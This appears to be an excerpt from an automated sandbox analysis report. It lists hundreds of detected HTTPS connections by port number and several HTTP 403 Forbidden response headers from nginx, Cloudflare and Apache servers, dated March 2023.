                      Source: unknownNetwork traffic detected: HTTP traffic on port 25038 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 20193 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2013 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26200
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26204
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26201
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26202
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5544 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60651 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 15285 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 14741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18310 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 24122 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 13043 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26273
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26270
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26271
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26276
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55299 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26277
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26274
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26275
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26278
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26279
                      Source: unknownNetwork traffic detected: HTTP traffic on port 10391 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18309 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19635 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 62881 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3302 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53501 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26261
                      Source: unknownNetwork traffic detected: HTTP traffic on port 20648 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26262
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26260
                      Source: unknownNetwork traffic detected: HTTP traffic on port 25459 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26265
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26266
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26263
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6882 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26264
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26269
                      Source: unknownNetwork traffic detected: HTTP traffic on port 21962 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26267
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26268
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59649 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26249
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16995 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26250
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 26376 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26254
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26255
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7798 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26252
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26253
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16598 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26258
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26259
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26256
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26257
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6485 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26238
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26239
                      Source: unknownNetwork traffic detected: HTTP traffic on port 13439 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 14356 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 23205 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26240
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26243
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26244
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26241
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26242
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26247
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26248
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26245
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26246
                      Source: unknownNetwork traffic detected: HTTP traffic on port 26700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 11209 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
                      Source: unknownNetwork traffic detected: HTTP traffic on port 20168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 22842 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26191
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26192
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 13861 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26195
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26196
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26194
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26199
                      Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26197
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 65089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 11210 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9571 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6064 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26188
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26189
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26187
                      Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 23675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56635 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 10342 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19684 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59625 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2938 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16153 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9101 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61195 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 22866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 1121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26163
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26161
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 21012 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 26169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59601 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
                      Source: unknownNetwork traffic detected: HTTP traffic on port 13415 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 11234 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2880 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
                      Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 13919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19214 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 6723
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wLueudhuaEpl%2B1qRk7O11Mpv%2BRakvM%2B4TOl3LhEHzjrAN%2BIux1LFRle4xMagFQArK8pZounJy9j11f2N0x22phDEW7b%2FL97UGkKfIgGl0H%2BmMb0GAcWJOmdQzyOS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7914803360c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:31 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:31 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K72dAt%2FWEmUAaCRdM3WAlwSVUbyms%2BbVjxvb7oQSNNi3Op6bmbfchCcbvBZFKWoOUK4Rt7TU6pqm7uv1cRUrIGt4lCPYv%2BL5i1ensmJA%2BF1TMTj3JZ1vyAd7kfZL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8857c8cbbcb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5LA0MgeDDdMNuebqqVrB%2FYt9gWTE5o6t1%2BTVQYdU6PePUPPMUQL6Je4uN1RPGVjaKnNqI%2FsrqX1zkzWwZ9pKcFe%2BXepbu55tzop%2Ffm0Iyc1UVDWXwvPMAIpKCIgd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc8863c103a67-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:07 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:32 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0GEb0hHB19jxZFY6dIMek5HP1wG4EZpsMFgbVQeV9FOMckjHz6F6uIh85%2BqiGGI22kPMt64G0yGzINSOYCFPZAdf8gHAH1uQjsZk64zGAfZIx9jcuoiqd%2BY5URuV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc929ce82918c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:33 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3gCVoP9B2Ggka7QVCnWEt3ak7dXyw9AFN4mOOPCjD6O8EQEpiWQRege08cYek4AKcFuebLCwyFEVQHs3RsVRRvnOjZaoQ4330WPRQiWVyRs6bxDiORBsYgdNDaGG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9385dfe2bce-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:35 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeVary: Accept-EncodingStrict-Transport-Security: max-age=31536000; includeSubDomains; preload
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:57 GMTServer: ApachePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: 0X-XSS-Protection: 1; mode=blockUpgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
